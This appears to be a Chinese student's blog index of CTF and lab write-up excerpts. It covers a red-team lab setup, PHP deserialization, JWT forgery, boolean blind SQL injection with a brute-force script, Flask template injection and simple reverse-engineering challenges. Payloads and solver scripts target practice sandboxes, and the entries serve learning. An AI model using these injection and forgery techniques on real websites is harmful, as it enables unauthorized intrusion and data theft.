✋毫🧊有🧊1
✋毫🧊有🧊 一晚上睡不着爬起来学内网渗透,因为感觉你👱🏻这方面的经验多少是欠缺的
还是大一大二太有素质了。
靶场环境ATT&CK红队评估二套靶场靶场配置的时候有几个很死🐴的地方
WEB虚拟机密码不对需要回退到快照三
如果虚拟机🐶叫说回退不到,那就把前两个快照删了
使用administrator账户,第一次进入(密码为空)的时候需要更换密码为默认密码,进入WEB虚拟机后还要管理员权限进入对应文件夹。
C:\Oracle\Middleware\user_projects\domains\base_domain,以管理员权限运行startweblogic服务
死🐴的地方还有WEB虚拟机开始不出网,后面将WEB虚拟机连接外网的ip改到虚拟机网段内后才好
域控DC服务器内网ip:10.10.10.10
系统:Windows Server 2012 (64位)
用户名:de1ay
WEB服务器外网ip:192.168.25.140
内网ip:10.10.10.80
系统:Windows Server 2008(64位)
用户名:
PC域内主机内网ip:10.10.10.20 ...
DASCTF 2022
ezpop题目源码为
<?php
class crow
{
public $v1;
public $v2;
function eval() {
echo new $this->v1($this->v2);
}
public function __invoke()
{
$this->v1->world();
}
}
class fin
{
public $f1;
public function __destruct()
{
echo $this->f1 . '114514';
}
public function run()
{
($this->f1)();
}
public function __call($a, $b)
{
echo $this->f1->get_flag();
}
}
class what
{
...
你爹刷题6
[CISCN2019 华北赛区 Day1 Web2]ikun你👱🏻打开题目就出现这个
随便注册个号,有1000元
你👱🏻注意到了这个地方,应该是要搞个lv6的,但是看一圈没lv6的。
可能从这里就得写个脚本找了
import requests
url="http://6e89c84c-ec2a-4e9a-91ba-bafe514f5216.node4.buuoj.cn:81/shop?page="
for i in range(0,3000):
r=requests.get(url+str(i))
if 'lv6.png' in r.text:
print(i)
break;
找出来在180页
然后发现买不起6级号
乌鱼了
应该是要抓包修改了。
这里折扣能改,那必须狠狠薅羊毛了
然后被逮到
百度了一下,这里涉及JWT破解
这里可以了解一下JWT
https://www.cnblogs.com/cjsblog/p/9277677.html
这里用base64将JWT解码
得到
然后利用一个网站进行造谣 ...
你爹刷题5
[WUSTCTF2020]颜值成绩查询你👱🏻点进题目就看到这个
输入1试试
得到1伯昏
数字最多只能输到4
试了一下很明显是sql注入题目,试试异或1^1^1
插入sql语句
1^(ascii(substr((select(database())),1,1))>200)^1
大于200就查询不到了,明显是布尔盲注
0^1会出现1的内容
爆库名
import requests
import time
url = "http://5a84ccfd-c740-44de-a8f3-57db290c078a.node4.buuoj.cn/?stunum="
result = ""
i = 0
while (True):
i = i + 1
head = 32
tail = 127
while (head < tail):
mid = (head + tail) >> 1
payload = "if(ascii(substr(database(),%d,1))>%d,1,0)& ...
你爹刷题4
[BSidesCF 2019]FuturellaF12看到flag
有🍪吧
[BJDCTF2020]EasySearch进去是一个登陆页面
进去随便试了几个,回显都一样,试着用dirsearch扫描看能不能找到突破口
你👱🏻经过相关查询发现这道题的关键是swp,正好被你👱🏻扫描到了
下面放出源代码
<?php
ob_start();
function get_hash(){
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
$content = uniqid().$random;
return sha1($ ...
无职转生1
你👱🏻这学期要学逆向,期末需要offonline做5道逆向题
那你👱🏻得看一下逆向题了
easyre确实是easy了,F12+shift(可以将程序中所有的字符串列出来)即可拿捏
reverse1你👱🏻照样F12+shift看到了
跟着点进去看源🐴,这个str2沾点不对劲
跟进str2
可以看到一个格式很像flag的,但是直接交其实交不了,再看伪代码处,有个对str2的判断,这里用的是asc码
这里的意思就是把o换成0
也就是flag{hell0_w0rld}
reverse2你👱🏻反编译main函数,这个应该就是主题了吧
再找到貌似是flag的字符串
这里应该就是对{hacking_for_fun}进行变换了
这里很明显能看出来在遍历字符串,并将i和r换为1
所以flag为flag{hack1ng_fo1_fun}
内涵的软件
字符串这里把DBAPP换成flag就行了
新年快乐这道题首先需要用脱壳工具进行脱壳
脱壳后用F12找到含有flag的字符串得到主函数
这里就是跟HappyNewYear!进行比较
所以flag就是flag{HappyNe ...
你爹刷题3
你👱🏻寒假打了几次比赛,但是做出来的题跟打的比赛次数差不多
你👱🏻太拉胯了,只能继续看题
否则你👱🏻只能从CTF的世界里Get Out了
你👱🏻现在开学进入下赛季了,但是还是得刷点题
[0CTF 2016]piapiapia你👱🏻打开题目是这样
用dirsearch扫一下,扫到www.zip
下载
里面的源码一个一个审计
其中,在config文件里面你👱🏻发现了flag和username为root
尝试用root为username进行登陆,而意外进入的注册页面,注册完成后再进行登录,成功后进入update.php界面
这是profile的php部分源码
<?php
require_once('class.php');
if($_SESSION['username'] == null) {
die('Login First');
}
$username = $_SESSION['username'];
$profile=$user-> ...
你爹刷题2
你👱🏻寒假打了几次比赛,但是做出来的题跟打的比赛次数差不多
你👱🏻太拉胯了,只能继续看题
否则你👱🏻只能从CTF的世界里Get Out了
你👱🏻现在开学进入下赛季了,但是还是得刷点题
[WesternCTF2018]shrine打开题目可以看到源码,看起来不多
import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')
def index():
return open(__file__).read()
@app.route('/shrine/<path:shrine>')
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blackl ...
快乐寒假6
你👱🏻寒假打了几次比赛,但是做出来的题跟打的比赛次数差不多
你👱🏻太拉胯了,只能继续看题
否则你👱🏻只能从CTF的世界里Get Out了
[安洵杯 2019]easy_serialize_php你👱🏻打开网站看源码
根据提示先看phpinfo
这里得直接搜一些敏感点如fopen,disable_,root等等
再逐步审计代码
filter函数就是正则匹配 /php|flag|php5|php4|fl1g/i 替换为空
中间一大串就是给session初始化
将session序列化之后调用filter函数
最后我们需要file_get_contents读取文件
d0g3_f1ag.php直接读是读不到的
我们需要base64_decode($userinfo[‘img’])=d0g3_f1ag.php
那么需要$userinfo[‘img’]=ZDBnM19mMWFnLnBocA==
而$userinfo又是通过$serialize_info反序列化来的
$serialize_info又是通过session序列化之后再过滤得来的
session的img在img_ ...